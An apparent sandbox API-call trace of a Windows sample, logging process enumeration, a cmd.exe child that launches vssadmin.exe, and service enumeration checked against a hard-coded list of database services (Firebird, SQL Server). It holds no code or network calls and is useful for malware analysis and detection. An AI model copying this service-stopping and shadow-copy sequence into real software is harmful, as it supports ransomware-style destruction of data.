	[0045.114] lstrlenW (lpString="svchost.exe") returned 11
	[0045.114] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0045.114] lstrlenW (lpString="svchost.exe") returned 11
	[0045.114] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0045.115] lstrlenW (lpString="audiodg.exe") returned 11
	[0045.115] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0045.115] lstrlenW (lpString="svchost.exe") returned 11
	[0045.115] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0045.116] lstrlenW (lpString="svchost.exe") returned 11
	[0045.116] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0045.116] lstrlenW (lpString="dwm.exe") returned 7
	[0045.116] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0045.117] lstrlenW (lpString="explorer.exe") returned 12
	[0045.117] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0045.117] lstrlenW (lpString="spoolsv.exe") returned 11
	[0045.117] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0045.118] lstrlenW (lpString="taskhost.exe") returned 12
	[0045.118] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0045.118] lstrlenW (lpString="svchost.exe") returned 11
	[0045.118] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0045.119] lstrlenW (lpString="taskeng.exe") returned 11
	[0045.119] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0045.119] lstrlenW (lpString="taskhost.exe") returned 12
	[0045.119] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0045.119] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0045.120] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0045.120] lstrlenW (lpString="python tragedy.exe") returned 18
	[0045.120] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0045.120] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0045.120] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0045.121] lstrlenW (lpString="computers.exe") returned 13
	[0045.121] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0045.121] lstrlenW (lpString="separated.exe") returned 13
	[0045.121] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0045.122] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0045.122] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0045.122] lstrlenW (lpString="darkness.exe") returned 12
	[0045.122] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0045.123] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0045.123] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0045.123] lstrlenW (lpString="sophisticated.exe") returned 17
	[0045.123] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0045.124] lstrlenW (lpString="wishlist.exe") returned 12
	[0045.124] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0045.124] lstrlenW (lpString="top.exe") returned 7
	[0045.124] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0045.125] lstrlenW (lpString="implemented.exe") returned 15
	[0045.125] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0045.125] lstrlenW (lpString="comp.exe") returned 8
	[0045.125] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0045.126] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0045.126] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0045.126] lstrlenW (lpString="solved.exe") returned 10
	[0045.126] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0045.127] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0045.127] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0045.127] lstrlenW (lpString="trips.exe") returned 9
	[0045.127] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0045.127] lstrlenW (lpString="tumormanual.exe") returned 15
	[0045.128] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0045.128] lstrlenW (lpString="telecom.exe") returned 11
	[0045.128] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0045.245] lstrlenW (lpString="realistic.exe") returned 13
	[0045.245] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0045.245] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0045.245] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0045.246] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0045.246] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0045.246] lstrlenW (lpString="cmd.exe") returned 7
	[0045.246] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0045.247] lstrlenW (lpString="conhost.exe") returned 11
	[0045.247] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0045.247] lstrlenW (lpString="vssadmin.exe") returned 12
	[0045.247] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0045.248] lstrlenW (lpString="VSSVC.exe") returned 9
	[0045.248] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0045.248] lstrlenW (lpString="svchost.exe") returned 11
	[0045.248] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0045.249] CloseHandle (hObject=0x21c) returned 1
	[0045.249] Sleep (dwMilliseconds=0x1f4) 
	[0046.300] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df3030
	[0046.300] EnumServicesStatusExW (in: hSCManager=0x7df3030, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0046.300] GetLastError () returned 0xea
	[0046.300] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xb4b70c0
	[0046.301] EnumServicesStatusExW (in: hSCManager=0x7df3030, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb4b70c0, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb4b70c0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0046.301] CloseServiceHandle (hSCObject=0x7df3030) returned 1
	[0046.301] lstrlenW (lpString="Appinfo") returned 7
	[0046.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0046.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0046.302] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0046.302] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0046.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0046.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0046.302] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0046.302] lstrlenW (lpString="AudioSrv") returned 8
	[0046.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0046.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0046.302] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0046.302] lstrlenW (lpString="BFE") returned 3
	[0046.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0046.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0046.302] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0046.302] lstrlenW (lpString="CryptSvc") returned 8
	[0046.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0046.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0046.302] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0046.302] lstrlenW (lpString="CscService") returned 10
	[0046.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0046.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0046.302] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0046.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0046.302] lstrlenW (lpString="DcomLaunch") returned 10
	[0046.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0046.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0046.303] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0046.303] lstrlenW (lpString="Dhcp") returned 4
	[0046.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0046.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0046.303] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0046.303] lstrlenW (lpString="Dnscache") returned 8
	[0046.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0046.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0046.303] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0046.303] lstrlenW (lpString="DPS") returned 3
	[0046.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0046.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0046.303] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0046.303] lstrlenW (lpString="eventlog") returned 8
	[0046.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0046.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0046.303] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0046.303] lstrlenW (lpString="EventSystem") returned 11
	[0046.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0046.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0046.303] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0046.303] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0046.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0046.304] lstrlenW (lpString="gpsvc") returned 5
	[0046.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0046.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0046.304] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0046.304] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0046.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0046.304] lstrlenW (lpString="iphlpsvc") returned 8
	[0046.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0046.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0046.304] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0046.304] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0046.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0046.304] lstrlenW (lpString="LanmanServer") returned 12
	[0046.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0046.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0046.304] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0046.304] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0046.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0046.304] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0046.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0046.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0046.304] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0046.304] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0046.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0046.304] lstrlenW (lpString="lmhosts") returned 7
	[0046.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0046.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0046.304] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0046.304] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0046.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0046.304] lstrlenW (lpString="MMCSS") returned 5
	[0046.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0046.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0046.305] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0046.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0046.305] lstrlenW (lpString="MpsSvc") returned 6
	[0046.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0046.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0046.305] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0046.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0046.305] lstrlenW (lpString="Netman") returned 6
	[0046.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0046.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0046.305] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0046.305] lstrlenW (lpString="netprofm") returned 8
	[0046.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0046.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0046.305] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0046.305] lstrlenW (lpString="NlaSvc") returned 6
	[0046.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0046.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0046.305] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0046.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0046.305] lstrlenW (lpString="nsi") returned 3
	[0046.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
